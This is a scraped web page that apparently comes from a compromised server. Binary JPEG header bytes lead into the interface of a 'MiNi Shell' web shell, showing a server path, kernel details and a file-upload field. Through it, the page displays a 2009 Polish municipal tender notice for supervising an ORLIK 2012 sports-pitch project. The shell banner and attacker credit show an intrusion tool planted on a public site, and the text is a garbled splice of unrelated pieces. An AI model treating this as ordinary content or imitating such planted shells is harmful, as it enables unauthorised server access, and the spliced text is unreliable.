JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090210/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090210/23610-N-2009.html

<p class="kh_header"><b>Grabowiec: Pełnienie funkcji Inwestora Zastępczego dla zadania  pn. Moje Boisko ORLIK 2012</b><br>
<b>Numer ogłoszenia: 23610 - 2009; data zamieszczenia: 10.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Grabowiec , Rynek 3, 22-425 Grabowiec, woj. lubelskie, tel. 0-85 6512466, faks 0-85 6512466.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.grabowiec.pl/bip</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inwestora Zastępczego dla zadania  pn. Moje Boisko ORLIK 2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie dotyczy wyboru Inwestora zastępczego dla zadania pn. Moje boisko ORLIK 2012 Inwestycja objęta zastępstwem inwestorskim pn.Moje boisko ORLIK 2012 polega na wykonaniu: 
a)	Budowy boiska do piłki nożnej o wymiarach 30,0 x 62,0 m o pow. całkowitej 1860m2 
b)	( pole gry 26,0 x 56,0 m )      
c)	Budowy boiska wielofunkcyjnego o wymiarach 19,1 x 32,1 o powierzchni 613,11m2      
d)	( pole gry 15,1 x 28,1 m )  
e)	Ogrodzenie terenu
f)	Oświetlenie terenu
g)	Chodniki
h)	Fundamenty pod budynek zaplecza socjalnego

1. Odpowiedzialność Inwestora Zastępczego:
a) Inwestor Zastępczy pełniąc czynności zastępstwa inwestorskiego działa w imieniu i na rachunek Zamawiającego jako Jego pełnomocnik.
b) Inwestor Zastępczy zobowiązany jest do podejmowania czynności mających na celu zabezpieczenie praw i interesów Zamawiającego.
c) Inwestor Zastępczy ponosi wobec Zamawiającego odpowiedzialność za wyrządzone szkody, będące następstwem nienależytego wykonania czynności objętych  umową.
d) Ponosi odpowiedzialność za skutki działania lub zaniechania osób wykonujących prace na jego rzecz.
e) Inwestor Zastępczy sprawuje nadzór inwestorski zgodnie z obowiązującymi przepisami ustawy Prawo Budowlane.

2. Obowiązki Inwestora Zastępczego.
a) Inwestor Zastępczy zobowiązuje się do realizacji praw i obowiązków wynikających z umów zawartych przy jego udziale przez Zamawiającego na realizację przedsięwzięcia inwestycyjnego.
b)  roboty budowlane muszą zostać zakończone nie później niż do 31.10.2009 r.

3. Inwestor zastępczy zobowiązany jest do szczegółowego  wykonania następujących obowiązków:

I. W ZAKRESIE POSTĘPOWAŃ PRZETARGOWYCH
Przygotowanie i przeprowadzenie przy udziale zamawiającego postępowań przetargowych w trybie zamówienia publicznego na wybór wykonawcy dokumentacji technicznej dla zadania pn.  Moje boisko ORLIK 2012  oraz na wybór wykonawcy budowy boiska zgodnie z wykonaną dokumentacją tj.:
1)	ustalenie w porozumieniu z Zamawiającym warunków stawianych przyszłym wykonawcom robót w zakresie doświadczenia, kwalifikacji, sytuacji finansowej, gwarancji, terminu wykonania zadań, kryteriów oceny ofert oraz warunków płatności,
2)	przygotowanie Specyfikacji Istotnych Warunków Zamówienia wraz ze wzorem umowy oraz innych dokumentów niezbędnych do wszczęcia postępowań oraz przedstawienia ich do zaakceptowania przez Zamawiającego,
3)	udzielanie odpowiedzi na pytania wykonawców dotyczące SIWZ,
4)	zorganizowanie otwarcia ofert z udziałem przedstawicieli Zamawiającego,
5)	dokonanie oceny złożonych ofert, wybór wykonawcy, który złożył ofertę najkorzystniejszą w świetle postawionych kryteriów i przedstawienie propozycji wybranej oferty do akceptacji przez Zamawiającego,
6)	udzielanie odpowiedzi na protesty złożone przez wykonawców, udział w ewentualnych odwołaniach przez nich wniesionych,
7)	doprowadzenie do zawarcia umów z Wykonawcą na wykonanie dokumentacji technicznej i                    z Wykonawcą robót oraz przedstawienie tych umów do podpisu Zamawiającego.

II. W ZAKRESIE OPRACOWANIA DOKUMENTACJI
1.	Współpraca z projektantem ,
2.	Kwalifikowanie nadzorów autorskich do zapłaty,
3.	Zgłaszanie projektantowi zastrzeżeń do dokumentacji i egzekwowanie od projektanta ewentualnych poprawek,
4.	Uzyskanie wymaganych przepisami decyzji administracyjnych oraz pozwolenia na budowę.

III. W ZAKRESIE WYKONAWSTWA ROBÓT
1)	Przekazanie Wykonawcy dokumentacji projektowej,
2)	Przygotowanie niezbędnych dokumentów do przekazania placu budowy i przekazanie przy udziale Zamawiającej,
3)	Ustanowienie inspektorów nadzoru we wszystkich branżach występujących w inwestycji ze wskazaniem inspektora - koordynatora, zgodnie z przepisami Prawa Budowlanego,
4)	Kontrola procesu  budowy oraz zapisów w dzienniku budowy, jej  zgodności  z dokumentacją projektową, techniczną, warunkami technicznymi wykonania robót, obowiązującymi przepisami, aktualną wiedzą techniczną, prawem budowlanym oraz umową o realizacji inwestycji,
5)	Sprawdzanie jakości wykonywanych robót i jakości wbudowywanych materiałów, 
6)	Udział w  odbiorach robót zanikających i  ulegających zakryciu;
7)	Sprawdzanie protokołów elementów robót i akceptowanie ich w zakresie rzeczowym i rachunkowym,
8)	Opracowywanie sprawozdań miesięcznych z wykonanego zakresu rzeczowo - finansowego i przedstawianie ich zamawiającej,
9)	Kontrolowanie zgodności realizacji inwestycji z zapisami umowy, 
10)	Kwalifikowanie zasadności wykonania ewentualnych robót dodatkowych w uzgodnieniu z zamawiającą,
11)	Pozyskanie dokumentacji powykonawczej,
12)	Prowadzenie narad koordynacyjnych na budowie w terminach uzgodnionych z Zamawiającą i wykonawcami robót,
13)	Wstrzymywanie robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie, bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę,
14)	Potwierdzanie faktycznie wykonanych robót, bądź ich elementów podlegających odbiorowi częściowemu, przygotowanie dokumentów do odbioru końcowego,
15)	Doprowadzenie do odbioru końcowego inwestycji, udział w komisjach odbiorowych i przekazanie inwestycji do eksploatacji przy założeniu, że odbierającym jest Zamawiający,
16)	Przygotowanie dla Zamawiającego dokumentów oraz wniosku o pozwolenie na użytkowanie lub zgłoszenie o zakończeniu budowy (ustawa Prawo Budowlane z dn. 7.07. 1994 r.)
17)	Egzekwowanie usunięcia przez wykonawcę robót usterek oraz niedoróbek stwierdzonych komisyjnie w trakcie odbiorów częściowych i odbioru końcowego,
18)	Udział w rozruchu inwestycji.

IV. W ZAKRESIE ROZLICZEŃ FINASOWYCH
1.	Kontrola prawidłowości wystawiania faktur, zakresów prac i kwot w zakresie zgodności z umową zawartą z Wykonawcą,
2.	Sprawdzanie faktur przejściowych i końcowych przedkładanych przez wykonawcę dokumentacji projektowej oraz wykonawcę robót, kwalifikowanie ich do zapłaty i przekazywanie ich Zamawiającemu do zapłaty,
3.	Sprawdzanie pod względem rachunkowym i merytorycznym kosztorysów robót,
4.	Przygotowanie materiałów związanych z naliczaniem kar umownych za nienależyte lub nieterminowe wykonanie zobowiązań umownych, których obowiązek zapłaty został  zastrzeżony w zawartych z wykonawcami umowach.
5.	Rozliczenie końcowe inwestycji , w tym przygotowanie dokumentów odbioru technicznego.

Zamawiający ma prawo zgłaszać w każdym czasie uwagi i zastrzeżenia dotyczące procesu inwestycyjnego, które Inwestor zastępczy winien niezwłocznie przeanalizować i uwzględnić, zawiadamiając Zamawiającego o podjętych działaniach..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.24.80.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Zamawiający wymaga od wykonawcy przystępującego do przetargu o wniesienie wadium o wysokości:  3.000,00 tysiące złotych ( trzy tysiące złotych 00-100).
2. Wadium wnosi się przed upływem terminu składania ofert; tj. do dnia 23.02.2009r. do godziny 13.00.
3. Wadium może być wnoszone w jednej kilku następujących formach:
a) pieniądzu,
b) poręczeniach bankowych,
c) poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
d) gwarancjach bankowych,
e) gwarancjach ubezpieczeniowych,
f) poręczeniach udzielonych przez podmioty, o których mowa w art. 6 b ust. 5 pkt2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U z 2007r. Nr 42, poz. 275 
4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy zamawiającego: 
PBS Zamość o-Grabowiec, konto nr 35  9644 1020 2006 2000 2512 0023
Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
5.Wadium wnoszone w formach wymienionych w pkt. 3 lit. b, c, d, e, f należy złożyć w formie oryginału w sekretariacie zamawiającego.
6. Nie należy załączać oryginału dokumentu złożenia wadium do oferty - należy załączyć potwierdzoną za zgodność z oryginałem kserokopię
7. Zamawiający zwraca niezwłocznie wadium, jeżeli:
- upłynął termin związania z ofertą
- zawarto umowę w sprawie zamówienia publicznego 
- zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
8. zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy:
- który wycofał ofertę przed upływem terminu składania ofert,
- który został wykluczony z postępowania,
- którego oferta została odrzucona
9. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
10. zamawiający zatrzymuje wadium wraz z odsetki, jeżeli wykonawca, którego oferta została wybrana:
- odmówił podpisania umowy w zamówienia publicznego na warunkach określonych w ofercie,
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania Zamówienia lub przedstawia pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d) nie podlegają wykluczeniu z postępowania, zgodnie z art. 24 Ustawy.
d) profil działalności musi odpowiadać przedmiotowi zamówienia
2. Zamawiający ustala następujące szczegółowe warunki udziału w postępowaniu:
a) Wymagana jest należyta staranność przy realizacji zobowiązań umowy,  
b)Wykonawca musi wykazać, że w ciągu ostatnich 3 lat pełnił role Inwestora Zastępczego lub Inżyniera Kontraktu na przynajmniej 1 inwestycji,
c)Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej,
3. Sprawdzenie ww warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia-nie spełnia. 
Uwaga: Do oceny spełniania warunku Zamawiający zakwalifikuje tylko te zadania, które rozpoczęto i zakończono w okresie ostatnich 3 lat przed dniem ogłoszenia o niniejszym przetargu w Biuletynie 
Zamówień Publicznych. 
4.Wykonawca określi telefony kontaktowe i numery fax. oraz inne ustalenia niezbędne  dla sprawnego i terminowego wykonania zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.   Wypełniony i podpisany formularz oferty - wg ZAŁĄCZNIKA NR 1 do SIWZ.
2. Wykaz osób do kontaktów z zamawiającym odpowiedzialnych za wykonanie umowy - ZAŁĄCZNIK NR 2 do SIWZ.
3. Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy - wg ZAŁĄCZNIKA NR 3 do SIWZ.
4. Wykaz zrealizowanych zamówień tożsamych w okresie ostatnich trzech lat: Role Inwestora Zastępczego lub Inżyniera Kontraktu na inwestycjach : -  w zakresie postępowań przetargowych na wybór dokumentacji projektowych o wartości poniżej kwot określonych w przepisach wydanych na podstawie art.11 ust. 8 ustawy PZP wraz z dokumentami potwierdzającymi, że roboty zostały wykonane należycie  wg ZAŁĄCZNIKA NR 4 do SIWZ
Uwaga: W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, ww. warunek mogą spełnić łącznie. 
5. Wykaz kadry technicznej przeznaczonej do realizacji zamówienia wraz z aktualnymi zaświadczeniami o przynależności do właściwej Izby Samorządu Zawodowego wg ZAŁĄCZNIKA NR  5 do SIWZ,
(do wykazu należy dołączyć kserokopię zaświadczenia o wpisie do właściwej Izby Samorządu Zawodowego oraz kserokopię uprawnień)
6.    Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
7. Oświadczenie potwierdzające, że wykonawca nie zalega z opłacaniem podatków, opłat, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego, 
8. Oświadczenie potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego
Uwaga: W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, dokumenty wymienione w pkt.6,7 i 8 winien dołączyć każdy podmiot występujący wspólnie.
10. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt.7,8 i 9  składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
a)  nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b)  nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.;
11. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt.7,8 i 9, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
Dokumenty, o których mowa w pkt.7,8 i 9 są składane w formie oryginału, odpisu, wypisu, wyciągu lub kopii, przetłumaczonych na język polski zawierających poświadczenie dokumentów zgodnie z konwencją haską z 1961 r., a w stosunku do państw, które nie podpisały konwencji haskiej poświadczone prze polskie placówki konsularne. 
Dokumenty sporządzone w języku obcym, inne niż określone w pkt.6,7 i8 są składane wraz z tłumaczeniem na język polski, sporządzonym przez tłumacza przysięgłego.  
12. Zgodnie z art. 23 ust.1 PZP Wykonawcy mogą ubiegać się wspólnie o udzielenie zamówienia. 
W przypadku, kiedy ofertę składa kilka podmiotów (konsorcjum-spółki cywilne) Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wówczas takie pełnomocnictwo powinno być stwierdzone w formie pisemnej i złożone w oryginale lub kserokopii potwierdzonej za zgodność z oryginałem przez udzielających pełnomocnictwa. 
13. Jeżeli Wykonawca nie złoży wymaganych dokumentów i oświadczeń lub nie spełni jednego bądź więcej warunków, jego oferta zostanie odrzucona lub Wykonawca zostanie wykluczony z postępowania. Zgodnie  z art. 24 ust. 4 ustawy PZP ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.  
W przypadku dołączenia do oferty kopii dokumentu, powyższa kopia musi być potwierdzona za zgodność  z oryginałem przez Wykonawcę lub upełnomocnionego przedstawiciela Wykonawcy - dołączyć pełnomocnictwo..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.grabowiec.pl/bip.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.grabowiec.pl/bip lub w Urzędzie Gminy - pokój nr 8.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2009 godzina 13:00, miejsce: Urząd Gminy Grabowiec - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com